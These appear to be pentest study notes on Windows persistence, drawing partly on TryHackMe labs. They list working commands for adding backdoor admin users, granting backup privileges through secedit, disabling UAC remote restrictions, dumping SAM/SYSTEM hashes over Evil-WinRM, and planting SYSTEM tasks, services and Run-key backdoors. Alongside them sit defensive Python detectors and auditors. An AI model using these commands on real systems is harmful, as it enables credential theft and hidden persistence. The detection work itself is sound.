CyberNotes

Persistence

Common ways for the attacker to remain on the system after initial access

Assign Group Memberships

Assuming you have successfully cracked the passwords for the unprivileged accounts in use, the most direct way to give an unprivileged user administrative privileges is to add it to the Administrators group (or to a group that carries equivalent rights):

C:\> net localgroup administrators user0 /add
C:\> net localgroup "Backup Operators" user1 /add
C:\> net localgroup "Remote Management Users" user1 /add

The backup and restore rights can also be granted without touching group membership: export the current security policy to a temporary file, then edit that file and append our user to the lines for SeBackupPrivilege and SeRestorePrivilege:

secedit /export /cfg config.inf

Then convert the edited .inf file into a .sdb database, which is used to load the configuration back into the system:

secedit /import /cfg config.inf /db config.sdb
secedit /configure /db config.sdb /cfg config.inf

Special privileges

In the case of the Backup Operators group, it has the following two privileges assigned by default:

  • SeBackupPrivilege: The user can read any file in the system, ignoring any DACL in place.
  • SeRestorePrivilege: The user can write any file in the system, ignoring any DACL in place.
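The exported .inf is a plain INI file, so a grant made this way (or one that was already there) can be audited offline. The following Python script is an added example, not code from these notes: it parses the [Privilege Rights] section of a secedit export and lists every principal holding SeBackupPrivilege or SeRestorePrivilege that is not one of the default holders, Administrators (S-1-5-32-544) and Backup Operators (S-1-5-32-551). The inf text and the user SID inside it are constructed for the example.

```python
"""Audit SeBackupPrivilege / SeRestorePrivilege holders in a secedit export.

Added example, not from the notes.  ``secedit /export /cfg config.inf`` writes
an INI-style file whose [Privilege Rights] section lists, per privilege, the
SIDs (prefixed with '*') or account names that hold it.
"""

# Well-known SIDs of the groups that hold both rights by default on a workstation.
DEFAULT_HOLDERS = {
    "S-1-5-32-544",  # BUILTIN\Administrators
    "S-1-5-32-551",  # BUILTIN\Backup Operators
}
WATCHED = ("SeBackupPrivilege", "SeRestorePrivilege")

# Constructed sample: a trimmed export after a local user's SID (made up for
# this example) was appended to both privilege lines.
SAMPLE_INF = """\
[Unicode]
Unicode=yes
[Privilege Rights]
SeNetworkLogonRight = *S-1-1-0,*S-1-5-32-544,*S-1-5-32-545
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-21-1004336348-1177238915-682003330-1001
SeRestorePrivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-21-1004336348-1177238915-682003330-1001
SeShutdownPrivilege = *S-1-5-32-544,*S-1-5-32-545
[Version]
signature="$CHICAGO$"
Revision=1
"""


def parse_privilege_rights(text):
    """Return {privilege: [principal, ...]} from the [Privilege Rights] section."""
    rights, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("["):
            in_section = line.lower() == "[privilege rights]"
            continue
        if not in_section or "=" not in line:
            continue
        name, _, value = line.partition("=")
        # Entries are '*SID' or a bare account name; drop the SID marker.
        rights[name.strip()] = [p.strip().lstrip("*") for p in value.split(",") if p.strip()]
    return rights


def non_default_holders(text, watched=WATCHED):
    """Map each watched privilege to the principals that are not default holders."""
    rights = parse_privilege_rights(text)
    return {priv: [p for p in rights.get(priv, []) if p not in DEFAULT_HOLDERS]
            for priv in watched}


def load_export(path):
    """Read a real export; secedit writes it as UTF-16 LE with a BOM."""
    with open(path, encoding="utf-16") as fh:
        return fh.read()


if __name__ == "__main__":
    for priv, extra in non_default_holders(SAMPLE_INF).items():
        print(priv, "OK" if not extra else "non-default holders: " + ", ".join(extra))
```

Any SID reported beyond the two built-in groups should be explained by policy or treated as a persistence indicator; resolve it with PowerShell's `(New-Object System.Security.Principal.SecurityIdentifier '<sid>').Translate([System.Security.Principal.NTAccount])`.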

To open the GUI dialog for the security descriptor of WinRM's default PowerShell endpoint (which decides who may connect to it), run the following in PowerShell; this needs an interactive GUI session:

Set-PSSessionConfiguration -Name Microsoft.PowerShell -ShowSecurityDescriptorUI

WinRM

  • Ports: 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)

Windows Remote Management (WinRM) is an HTTP-based protocol (Microsoft's implementation of WS-Management) used to run commands and PowerShell on Windows hosts remotely.

To open a remote shell from the command line, we can use the following command:

winrs.exe -u:Administrator -p:Mypass123 -r:target cmd

Evil-WinRM

Evil-WinRM is a post-exploitation tool designed for ethical hacking and penetration testing, providing a streamlined and efficient way to interact with Windows systems via Windows Remote Management (WinRM).

Usage

evil-winrm -i 10.10.123.33 -u user1 -p Password321

To get a full (unfiltered) administrative token for our local admin user over the network, we have to switch off UAC's remote restrictions by setting LocalAccountTokenFilterPolicy to 1 in the following registry key:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1

Then, proceed to make a backup of the SAM and SYSTEM files and download them to the attacker's machine:

*Evil-WinRM* PS C:\> reg save hklm\system system.bak
The operation completed successfully.
*Evil-WinRM* PS C:\> reg save hklm\sam sam.bak
The operation completed successfully.
*Evil-WinRM* PS C:\> download system.bak
Info: Download successful!
*Evil-WinRM* PS C:\> download sam.bak
Info: Download successful!

With those files, we can dump the password hashes for all users using secretsdump.py or other similar tools:

python3.9 /opt/impacket/examples/secretsdump.py -sam sam.bak -system system.bak LOCAL
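From the defensive side, both the LocalAccountTokenFilterPolicy change and the hive exports leave distinctive command lines in process-creation telemetry (Security event 4688 with command-line logging enabled, or Sysmon event 1). The Python below is an added example, not part of these notes: it applies two matching rules to a small set of constructed records (timestamp, host, user, command line; not a real event layout) and additionally reports hosts where both SAM and SYSTEM were exported, since that pair is exactly what secretsdump needs.

```python
"""Detect credential-hive exports and UAC remote-restriction changes in
process-creation telemetry.  Added example, not from the notes.

Both steps of the walkthrough leave a command line behind:
reg save hklm\\sam / reg save hklm\\system and
reg add ... /v LocalAccountTokenFilterPolicy /d 1.
"""
import re

# Constructed records: (timestamp, host, user, command line).  This is not a
# real Windows event layout, only the fields a 4688 / Sysmon 1 event supplies.
SAMPLE_EVENTS = [
    ("2024-05-01T10:01:02", "WS01", "WS01\\user1",
     r'"C:\Windows\system32\reg.exe" save hklm\system system.bak'),
    ("2024-05-01T10:01:05", "WS01", "WS01\\user1",
     r'"C:\Windows\system32\reg.exe" save hklm\sam sam.bak'),
    ("2024-05-01T10:02:11", "WS01", "WS01\\user1",
     r"reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
     r" /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1"),
    ("2024-05-01T10:03:00", "WS01", "WS01\\user1",
     r"reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"),
    ("2024-05-01T10:04:00", "WS02", "NT AUTHORITY\\SYSTEM",
     r"reg add HKLM\SOFTWARE\Contoso\Agent /v Enabled /t REG_DWORD /d 1"),
]

# reg[.exe] save of the SAM, SYSTEM or SECURITY hive, any case, quoted or not.
HIVE_SAVE = re.compile(
    r'\breg(?:\.exe)?"?\s+save\s+"?(?:hklm|hkey_local_machine)\\(sam|system|security)\b',
    re.IGNORECASE)
# reg add that sets LocalAccountTokenFilterPolicy to 1 under ...\Policies\System,
# whatever the argument order.
TOKEN_FILTER = re.compile(
    r'\breg(?:\.exe)?"?\s+add\b(?=.*\\Policies\\System\b)'
    r'(?=.*/v\s+LocalAccountTokenFilterPolicy\b)(?=.*/d\s+0*1\b)',
    re.IGNORECASE)


def classify(command_line):
    """Return a finding label for a command line, or None if nothing matched."""
    m = HIVE_SAVE.search(command_line)
    if m:
        return "hive_export:" + m.group(1).lower()
    if TOKEN_FILTER.search(command_line):
        return "uac_remote_restrictions_disabled"
    return None


def scan(events):
    """Return [(timestamp, host, user, label)] for every matching record."""
    findings = []
    for ts, host, user, cmd in events:
        label = classify(cmd)
        if label:
            findings.append((ts, host, user, label))
    return findings


def hosts_with_full_chain(events):
    """Hosts where both SAM and SYSTEM were exported: together they yield the
    local password hashes, so this pairing deserves the highest priority."""
    seen = {}
    for _ts, host, _user, label in scan(events):
        seen.setdefault(host, set()).add(label)
    return sorted(h for h, labels in seen.items()
                  if {"hive_export:sam", "hive_export:system"} <= labels)


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(*finding)
    print("full SAM+SYSTEM export on:", hosts_with_full_chain(SAMPLE_EVENTS))
```

The hive rule also fires on legitimate backup tooling, so pair it with the user context (an interactive or WinRM logon of a plain user rather than a backup service account) before escalating; the LocalAccountTokenFilterPolicy rule rarely has a benign explanation outside controlled configuration management.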

Via Tasks

schtasks /create /tn "SystemCleanup" /tr "C:\Users\Win10\Downloads\notmalware.exe" /sc daily /st 09:00 /ru SYSTEM
schtasks /query /fo LIST
schtasks /query /tn "SystemCleanup"
schtasks /query /tn "SystemCleanup" /v /fo LIST

Via Services

Using SC (Service Control Manager)

sc create BackupService binPath= "C:\Users\Win10\Downloads\notmalware.exe" start= auto
sc query                      // running services only
sc query state= all           // running and stopped services
sc query "BackupService"
sc qc "BackupService"         // query the configuration of the service

Using Powershell

Get-Service
Get-Service | Where-Object { $_.Status -eq 'Running' }
Get-Service -Name "BackupService"
Get-Service -Name "B*"        // wildcards are accepted
Get-Service -Name "BackupService" | Select-Object *

Get-WmiObject -Class Win32_Service -Filter "Name = 'BackupService'" | Select-Object *
or
Get-CimInstance -Class Win32_Service -Filter "Name = 'BackupService'" | Select-Object *
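Both the scheduled task from "Via Tasks" and the service from "Via Services" share one tell: something running as SYSTEM whose binary sits in a directory a normal user can write to. The Python below is an added example, not from these notes, that serves both sections: it parses the text printed by `schtasks /query /v /fo LIST` and by `sc qc <name>` and applies that one heuristic to each. The task listing and service configuration are constructed samples in those output formats, and the list of user-writable locations is an assumption of the example, not exhaustive.

```python
"""Flag scheduled tasks and services that run as SYSTEM from user-writable paths.

Added example, not from the notes.  Parses the text printed by
schtasks /query /v /fo LIST and sc qc <name>, and applies one heuristic to
both: a SYSTEM-level task or service whose executable lives under a user
profile, Temp or ProgramData is worth a look.  Samples are constructed.
"""
import re

# Locations a non-admin user can normally write to (heuristic, not exhaustive).
USER_WRITABLE = re.compile(
    r"^[a-z]:\\(?:users\\[^\\]+\\|windows\\temp\\|temp\\|programdata\\)", re.IGNORECASE)
PRIVILEGED = {"SYSTEM", "NT AUTHORITY\\SYSTEM", "LOCALSYSTEM"}

SAMPLE_SCHTASKS = r"""
HostName:                             WS01
TaskName:                             \SystemCleanup
Next Run Time:                        5/2/2024 9:00:00 AM
Status:                               Ready
Author:                               WS01\Win10
Task To Run:                          C:\Users\Win10\Downloads\notmalware.exe
Run As User:                          SYSTEM
Schedule Type:                        Daily

HostName:                             WS01
TaskName:                             \Microsoft\Windows\Defrag\ScheduledDefrag
Task To Run:                          %windir%\system32\defrag.exe -c -h -o -$
Run As User:                          SYSTEM
Schedule Type:                        Weekly
"""

SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: BackupService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\Win10\Downloads\notmalware.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : BackupService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""


def extract_executable(command):
    """Return the executable path from a command string, quoted or not."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    m = re.match(r"(.*?\.exe)(?:\s|$)", command, re.IGNORECASE)
    return m.group(1) if m else command.split(" ")[0]


def parse_list_output(text):
    """Split 'Key: value' blocks separated by blank lines (schtasks /fo LIST)."""
    entries, current = [], {}
    for raw in text.splitlines():
        if not raw.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        key, sep, value = raw.partition(":")   # only the first colon separates
        if sep:
            current[key.strip()] = value.strip()
    if current:
        entries.append(current)
    return entries


def parse_sc_qc(text):
    """Parse the 'KEY : value' lines of sc qc output into a dict."""
    cfg = {}
    for raw in text.splitlines():
        m = re.match(r"([A-Z_]+)\s*:\s*(.*)$", raw.strip())
        if m:
            cfg[m.group(1)] = m.group(2).strip()
    return cfg


def suspicious_tasks(text):
    """[(task name, executable)] for SYSTEM tasks launched from user-writable paths."""
    hits = []
    for task in parse_list_output(text):
        if "TaskName" not in task:
            continue
        exe = extract_executable(task.get("Task To Run", ""))
        if task.get("Run As User", "").upper() in PRIVILEGED and USER_WRITABLE.match(exe):
            hits.append((task["TaskName"], exe))
    return hits


def suspicious_service(text):
    """(service name, executable) if a LocalSystem service runs from a user-writable path."""
    cfg = parse_sc_qc(text)
    exe = extract_executable(cfg.get("BINARY_PATH_NAME", ""))
    if cfg.get("SERVICE_START_NAME", "").upper() in PRIVILEGED and USER_WRITABLE.match(exe):
        return cfg.get("SERVICE_NAME"), exe
    return None


if __name__ == "__main__":
    print(suspicious_tasks(SAMPLE_SCHTASKS))
    print(suspicious_service(SAMPLE_SC_QC))
```

On a live host, feed it the real output (`schtasks /query /v /fo LIST > tasks.txt`, and `sc qc` per service name from `sc query state= all`); the same heuristic applied to the Run keys of the next section catches the user-level variant of this persistence.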

Via Registry

Using reg

reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"
 
etc…

Using Powershell

Get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"

Backdoor after initial access

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "NotABackdoor" /t REG_SZ /d "C:\Users\Win10\Downloads\notmalware.exe" /f 
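Run-key persistence is easiest to spot by comparison rather than by inspection: keep a known-good listing of the Run/RunOnce keys and diff later output against it. The Python below is an added example, not from these notes, that parses the text `reg query` prints (one value per line, name, type and data separated by runs of spaces) and reports values that were added, changed or removed between two listings; both listings are constructed samples in that format, with the "NotABackdoor" value from above appearing in the current one.

```python
"""Diff Run/RunOnce key listings against a saved baseline.
Added example, not from the notes.  Input is the text printed by reg query.
"""
import re

# Constructed sample: a baseline listing taken on a clean machine.
BASELINE = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\Win10\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Discord    REG_SZ    C:\Users\Win10\AppData\Local\Discord\Update.exe --processStart Discord.exe
"""

# Constructed sample: the same key later, with one new value and one whose
# path was swapped for a binary in Downloads.
CURRENT = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\Win10\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Discord    REG_SZ    C:\Users\Win10\Downloads\Update.exe --processStart Discord.exe
    NotABackdoor    REG_SZ    C:\Users\Win10\Downloads\notmalware.exe
"""

# Indented value line: <name>  <REG_type>  <data>; reg query uses four spaces
# between the fields, so names containing single spaces still parse.
VALUE_LINE = re.compile(r"^\s+(.+?)\s{2,}(REG_[A-Z_]+)\s{2,}(.*)$")


def parse_reg_query(text):
    """Return {key_path: {value_name: (type, data)}} from reg query output."""
    result, key = {}, None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if not raw[0].isspace():          # key paths start in column 0
            key = raw.strip()
            result.setdefault(key, {})
            continue
        m = VALUE_LINE.match(raw)
        if m and key is not None:
            result[key][m.group(1)] = (m.group(2), m.group(3).strip())
    return result


def diff_autoruns(baseline_text, current_text):
    """Return (added, changed, removed) as lists of (key, name, data)."""
    base, cur = parse_reg_query(baseline_text), parse_reg_query(current_text)
    added, changed, removed = [], [], []
    for key in sorted(set(base) | set(cur)):
        b, c = base.get(key, {}), cur.get(key, {})
        for name in sorted(set(b) | set(c)):
            if name not in b:
                added.append((key, name, c[name][1]))
            elif name not in c:
                removed.append((key, name, b[name][1]))
            elif b[name] != c[name]:
                changed.append((key, name, c[name][1]))
    return added, changed, removed


if __name__ == "__main__":
    for label, rows in zip(("added", "changed", "removed"), diff_autoruns(BASELINE, CURRENT)):
        for key, name, data in rows:
            print(f"{label:8} {name} -> {data}")
```

A changed entry matters as much as an added one: replacing the data behind a name that already exists ("Discord" above) keeps the value count unchanged and survives a glance at the key, so compare data, not just names. Take the baseline for each of the four Run/RunOnce keys listed above (HKCU and HKLM) and store it off-host, since the same user who can write the key can edit a local baseline.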

Create Tasks Remotely

Since the system will run the scheduled task, the command's output won't be available to us, making this a blind attack.

Examples from THM (TryHackMe)

schtasks /s TARGET /RU "SYSTEM" /create /tn "THMtask1" /tr "<command/payload to execute>" /sc ONCE /sd 01/01/1970 /st 00:00
schtasks /s TARGET /run /TN "THMtask1"

// Cleanup
schtasks /S TARGET /TN "THMtask1" /DELETE /F

// Same idea with a service instead of a task: create and start it on the remote host
C:\> sc.exe \\thmiis.za.tryhackme.com create hourglass9 binPath= "%windir%\myservice.exe" start= auto
C:\> sc.exe \\thmiis.za.tryhackme.com start hourglass9
